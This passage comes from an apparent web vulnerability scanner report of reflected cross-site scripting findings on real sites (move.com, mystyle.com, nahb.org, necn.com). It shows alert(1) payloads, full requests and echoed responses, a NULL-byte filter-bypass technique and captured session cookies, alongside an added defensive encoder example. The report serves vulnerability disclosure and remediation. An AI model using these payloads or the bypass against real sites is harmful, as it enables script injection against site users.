s.prop27="trends.move.com";
s.prop26= 'Not Registered';
var s_code=s.t();
if(s_co
...[SNIP]...

2.508. http://www.move.com/trends/holiday-gifts-for-the-cat-lover/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.move.com
Path:   /trends/holiday-gifts-for-the-cat-lover/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 987be</script><script>alert(1)</script>509f8e09b6e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trends/holiday-gifts-for-the-cat-lover987be</script><script>alert(1)</script>509f8e09b6e/ HTTP/1.1
Host: www.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:10:38 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.move.com/trends/xmlrpc.php
Keep-Alive: timeout=2, max=170
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 67839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript" language="JavaScript">
s.pageName="Trends: trends/holiday-gifts-for-the-cat-lover987be</script><script>alert(1)</script>509f8e09b6e";
s.channel="Trends";

if(s.pageName){ s.prop21="M: " + s.pageName; }
if(s.channel){ s.prop22="M: " + s.channel; }

s.prop27="trends.move.com";
s.prop26= 'Not Registered';
var s_code=s.t();
if(s_code
...[SNIP]...

2.509. http://www.move.com/trends/holiday-gifts-for-the-cat-lover/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.move.com
Path:   /trends/holiday-gifts-for-the-cat-lover/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b77bc</script><script>alert(1)</script>0f5df801394 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trends/holiday-gifts-for-the-cat-lover/?b77bc</script><script>alert(1)</script>0f5df801394=1 HTTP/1.1
Host: www.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:10:18 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.move.com/trends/xmlrpc.php
Keep-Alive: timeout=2, max=181
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 40116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript" language="JavaScript">
s.pageName="Trends: trends/holiday-gifts-for-the-cat-lover/?b77bc</script><script>alert(1)</script>0f5df801394=1";
s.channel="Trends";

if(s.pageName){ s.prop21="M: " + s.pageName; }
if(s.channel){ s.prop22="M: " + s.channel; }

s.prop27="trends.move.com";
s.prop26= 'Not Registered';
var s_code=s.t();
if(s_co
...[SNIP]...

2.510. http://www.move.com/trends/holiday-gifts-for-the-dog-lover/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.move.com
Path:   /trends/holiday-gifts-for-the-dog-lover/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24430</script><script>alert(1)</script>20e42232118 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trends/holiday-gifts-for-the-dog-lover24430</script><script>alert(1)</script>20e42232118/ HTTP/1.1
Host: www.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:10:42 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.move.com/trends/xmlrpc.php
Keep-Alive: timeout=2, max=191
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 67839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript" language="JavaScript">
s.pageName="Trends: trends/holiday-gifts-for-the-dog-lover24430</script><script>alert(1)</script>20e42232118";
s.channel="Trends";

if(s.pageName){ s.prop21="M: " + s.pageName; }
if(s.channel){ s.prop22="M: " + s.channel; }

s.prop27="trends.move.com";
s.prop26= 'Not Registered';
var s_code=s.t();
if(s_code
...[SNIP]...

2.511. http://www.move.com/trends/holiday-gifts-for-the-dog-lover/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.move.com
Path:   /trends/holiday-gifts-for-the-dog-lover/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 719ff</script><script>alert(1)</script>5e744f4ced2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trends/holiday-gifts-for-the-dog-lover/?719ff</script><script>alert(1)</script>5e744f4ced2=1 HTTP/1.1
Host: www.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:10:21 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.move.com/trends/xmlrpc.php
Keep-Alive: timeout=2, max=177
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 40396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript" language="JavaScript">
s.pageName="Trends: trends/holiday-gifts-for-the-dog-lover/?719ff</script><script>alert(1)</script>5e744f4ced2=1";
s.channel="Trends";

if(s.pageName){ s.prop21="M: " + s.pageName; }
if(s.channel){ s.prop22="M: " + s.channel; }

s.prop27="trends.move.com";
s.prop26= 'Not Registered';
var s_code=s.t();
if(s_co
...[SNIP]...

2.512. http://www.move.com/trends/sweet-holiday-treats-in-san-francisco/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.move.com
Path:   /trends/sweet-holiday-treats-in-san-francisco/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f208</script><script>alert(1)</script>1d8647608ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trends/sweet-holiday-treats-in-san-francisco2f208</script><script>alert(1)</script>1d8647608ac/ HTTP/1.1
Host: www.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:10:42 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.move.com/trends/xmlrpc.php
Keep-Alive: timeout=2, max=167
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 67851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript" language="JavaScript">
s.pageName="Trends: trends/sweet-holiday-treats-in-san-francisco2f208</script><script>alert(1)</script>1d8647608ac";
s.channel="Trends";

if(s.pageName){ s.prop21="M: " + s.pageName; }
if(s.channel){ s.prop22="M: " + s.channel; }

s.prop27="trends.move.com";
s.prop26= 'Not Registered';
var s_code=s.t();
if(s_code
...[SNIP]...

2.513. http://www.move.com/trends/sweet-holiday-treats-in-san-francisco/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.move.com
Path:   /trends/sweet-holiday-treats-in-san-francisco/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2da9d</script><script>alert(1)</script>634675ff90a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trends/sweet-holiday-treats-in-san-francisco/?2da9d</script><script>alert(1)</script>634675ff90a=1 HTTP/1.1
Host: www.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:10:23 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.move.com/trends/xmlrpc.php
Keep-Alive: timeout=2, max=188
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 37689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript" language="JavaScript">
s.pageName="Trends: trends/sweet-holiday-treats-in-san-francisco/?2da9d</script><script>alert(1)</script>634675ff90a=1";
s.channel="Trends";

if(s.pageName){ s.prop21="M: " + s.pageName; }
if(s.channel){ s.prop22="M: " + s.channel; }

s.prop27="trends.move.com";
s.prop26= 'Not Registered';
var s_code=s.t();
if(s_co
...[SNIP]...

2.514. http://www.mystyle.com/mystyle/photos/gallery.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mystyle.com
Path:   /mystyle/photos/gallery.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript block comment (/* ... */). The payload ac901*/alert(1)//267d3ec3044 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response: the */ in the payload closes the comment early, alert(1) is then parsed as live code, and the trailing // comments out the rest of the line so the surrounding statement does not cause a syntax error.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mystyle/photos/gallery.jsp?ac901*/alert(1)//267d3ec3044=1 HTTP/1.1
Host: www.mystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: edition=us; s_lv=1292783272263; CyberTargetAnonymous=CTLCFD02D70D3824770A4F7FC69490938E3; JSESSIONID=4946C5556DE8C4F50FD20777C1C43F10; __utmz=4334511.1292783273.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_eVar10=0; s_photo_viewer=no-photo; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; photo=1; s_percentseen=0.5; s_cc=true; s_vi=[CS]v1|2687275E05011290-60000115E0008D9B[CE]; contribution=1; s_nr=1292783272265; __utma=4334511.925277804.1292783273.1292783273.1292783273.1; s_contributor=no-contributions; __utmc=4334511; __utmb=4334511.1.10.1292783273;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:43:35 GMT
Server: Apache/2.2.2 (Unix) mod_jk/1.2.20 PHP/5.2.8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=60
Expires: Sun, 19 Dec 2010 18:44:35 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 11927


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="ISO-8859-1
...[SNIP]...
entImageUUID = urlhash.substring(1);
       UUID.GetIndex('', currentImageUUID);
       Event.observe(window, 'load', function() {
           Photo.Load('http://www.mystyle.com/mystyle/photos/gallery.jsp?ac901*/alert(1)//267d3ec3044=1', '', currentImageUUID, '/mystyle/photos/gallery.jsp', true)
       });
   }
*/

} else {
   navPageIndex = 0;
   Event.observe(window, 'load', function() {
       Photo.Load
...[SNIP]...

2.515. http://www.mystyle.com/mystyle/photos/gallery.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mystyle.com
Path:   /mystyle/photos/gallery.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a7b3'-alert(1)-'31bccd1e610 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mystyle/photos/gallery.jsp?7a7b3'-alert(1)-'31bccd1e610=1 HTTP/1.1
Host: www.mystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: edition=us; s_lv=1292783272263; CyberTargetAnonymous=CTLCFD02D70D3824770A4F7FC69490938E3; JSESSIONID=4946C5556DE8C4F50FD20777C1C43F10; __utmz=4334511.1292783273.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_eVar10=0; s_photo_viewer=no-photo; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; photo=1; s_percentseen=0.5; s_cc=true; s_vi=[CS]v1|2687275E05011290-60000115E0008D9B[CE]; contribution=1; s_nr=1292783272265; __utma=4334511.925277804.1292783273.1292783273.1292783273.1; s_contributor=no-contributions; __utmc=4334511; __utmb=4334511.1.10.1292783273;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:43:32 GMT
Server: Apache/2.2.2 (Unix) mod_jk/1.2.20 PHP/5.2.8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=60
Expires: Sun, 19 Dec 2010 18:44:32 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 11927


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="ISO-8859-1
...[SNIP]...
currentImageUUID = urlhash;
UUID.GetIndex('', currentImageUUID);
Event.observe(window, 'load', function() {
   Photo.Load('http://www.mystyle.com/mystyle/photos/gallery.jsp?7a7b3'-alert(1)-'31bccd1e610=1', '', currentImageUUID, '/mystyle/photos/gallery.jsp', true)
});
// MS-553

// MS-553
/*
   var urlhash = document.location.hash;
   if(urlhash.length >
...[SNIP]...
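
The move.com issues above (2.503 to 2.513) and the two mystyle.com issues (2.514 and 2.515) all place request-derived text inside an inline <script> block. The following is an added example, not code from any of those sites or from the scanner: a Node.js encoder for the JavaScript-string context, shown beside the unsafe concatenation the report's responses exhibit, plus a response-side check that counts script end tags. buildAnalyticsScriptUnsafe and buildAnalyticsScriptSafe are hypothetical stand-ins for the page template that sets s.pageName, and the request paths are constructed from the report's payloads.

```javascript
// Added example, not move.com's or mystyle.com's code. Shows the unsafe
// pattern from the report next to a hardened encoder for values that land in
// a JavaScript string literal inside an inline <script>. buildAnalyticsScript*
// are hypothetical stand-ins for the template that sets s.pageName.

// Produce a complete, double-quoted JS string literal for `value`.
// JSON.stringify escapes quotes, backslashes and control characters; the
// extra replacements keep the HTML tokenizer from seeing "</script", "<!--"
// or "-->" inside the block (and "&" from being decoded if the page is ever
// served as XHTML), and stop U+2028/U+2029 from acting as line terminators.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Vulnerable form (what the report shows for s.pageName): the request path is
// concatenated into a double-quoted literal, so "</script>" in the path ends
// the script element before the JavaScript parser ever sees the quotes.
function buildAnalyticsScriptUnsafe(requestPath) {
  return '<script type="text/javascript">\n' +
    's.pageName="Trends: ' + requestPath + '";\n' +
    's.channel="Trends";\n' +
    '</script>';
}

// Hardened form: the whole assembled string is encoded into one literal, so
// the fixed prefix and the untrusted path share a single, known context.
function buildAnalyticsScriptSafe(requestPath) {
  return '<script type="text/javascript">\n' +
    's.pageName=' + jsStringLiteral('Trends: ' + requestPath) + ';\n' +
    's.channel="Trends";\n' +
    '</script>';
}

// Response-side check: the HTML tokenizer ends a script element at the first
// "</script" it meets, so a correctly rendered block contains exactly one.
function countScriptEndTags(html) {
  return (html.match(/<\/script/gi) || []).length;
}

// Evaluating the encoded literal must give back the original value, i.e. the
// encoder changed the spelling of the literal, not what it denotes.
function roundTrips(value) {
  return new Function('return ' + jsStringLiteral(value))() === value;
}

// Request paths constructed from the report's payloads (2.503 and 2.515).
const PAYLOADS = {
  scriptBreakout: 'trends/?a4aa3</script><script>alert(1)</script>bba5a26af0a=1',
  singleQuote: "gallery.jsp?7a7b3'-alert(1)-'31bccd1e610=1",
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, path] of Object.entries(PAYLOADS)) {
    console.log(name,
      'unsafe end tags:', countScriptEndTags(buildAnalyticsScriptUnsafe(path)),
      'safe end tags:', countScriptEndTags(buildAnalyticsScriptSafe(path)));
  }
}
```

Two caveats the encoder does not remove. Data copied into a JavaScript comment, as in 2.514, sits outside any literal, so no string encoding applies; the only fix there is not to emit the value into the comment at all. And the encoder's output is a whole literal, including its double quotes: splicing it into an existing single-quoted literal (the Photo.Load('...') form in 2.515) would be wrong, so the template has to be changed to emit the encoder's literal in place of the quoted string rather than escape into it.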

2.516. http://www.nahb.org/news.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nahb.org
Path:   /news.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0099ce2"><script>alert(1)</script>83e8d49bc40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99ce2"><script>alert(1)</script>83e8d49bc40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /news.aspx?%0099ce2"><script>alert(1)</script>83e8d49bc40=1 HTTP/1.1
Host: www.nahb.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:12:57 GMT
Server: WWW Server/1.1
P3P: CP="OTI DSP COR CUR DEVi PSA IVA OUR DEL SAM IND UNI NAV PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: siteCookieTemp=1652480c-ab74-4941-b566-a52ef08cc114; domain=nahb.org; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 58387


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>
   NAHB: View & Search News Releases
</title><meta name="verify-v1" cont
...[SNIP]...
<a href="/news.aspx?%0099ce2"><script>alert(1)</script>83e8d49bc40=1&print=true" id="ctl00_pfv_aPfLink">
...[SNIP]...

2.517. http://www.nahb.org/page.aspx/landing/sectionID=85 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nahb.org
Path:   /page.aspx/landing/sectionID=85

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0092fba"><script>alert(1)</script>7bb7aa42834 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 92fba"><script>alert(1)</script>7bb7aa42834 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /page.aspx/landing/sectionID=85?%0092fba"><script>alert(1)</script>7bb7aa42834=1 HTTP/1.1
Host: www.nahb.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:09:50 GMT
Server: WWW Server/1.1
P3P: CP="OTI DSP COR CUR DEVi PSA IVA OUR DEL SAM IND UNI NAV PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: siteCookieTemp=f6b50901-fced-482a-ac49-5187abeb50ff; domain=nahb.org; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 38223


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>
   NAHB: Housing Industry Association, Market Information on Housing Indu
...[SNIP]...
<a href="/page.aspx/landing/sectionID=85?%0092fba"><script>alert(1)</script>7bb7aa42834=1/print=true" id="ctl00_pfv_aPfLink">
...[SNIP]...

2.518. http://www.necn.com/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37e92"><script>alert(1)</script>754dcd99236 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1237e92"><script>alert(1)</script>754dcd99236/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44846
Content-Type: text/html
Set-Cookie: PHPSESSID=45c4034b3be571cead558b1fdb9fd020; path=/
Expires: Sun, 19 Dec 2010 18:42:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:42:43 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/1237e92"><script>alert(1)</script>754dcd99236/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html">
...[SNIP]...

2.519. http://www.necn.com/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5da3d"><script>alert(1)</script>886aefdb2ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/195da3d"><script>alert(1)</script>886aefdb2ca/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44827
Content-Type: text/html
Set-Cookie: PHPSESSID=5750fd9d534e366007ec0d2eda3219cf; path=/
Expires: Sun, 19 Dec 2010 18:42:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:42:44 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/195da3d"><script>alert(1)</script>886aefdb2ca/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html">
...[SNIP]...

2.520. http://www.necn.com/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a00f3"><script>alert(1)</script>da8131b3d5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10a00f3"><script>alert(1)</script>da8131b3d5/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44842
Content-Type: text/html
Set-Cookie: PHPSESSID=70e6f16534e048ee86d20c4979944d23; path=/
Expires: Sun, 19 Dec 2010 18:42:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:42:45 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/19/10a00f3"><script>alert(1)</script>da8131b3d5/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html">
...[SNIP]...

2.521. http://www.necn.com/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bff77"><script>alert(1)</script>a29c90745a1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

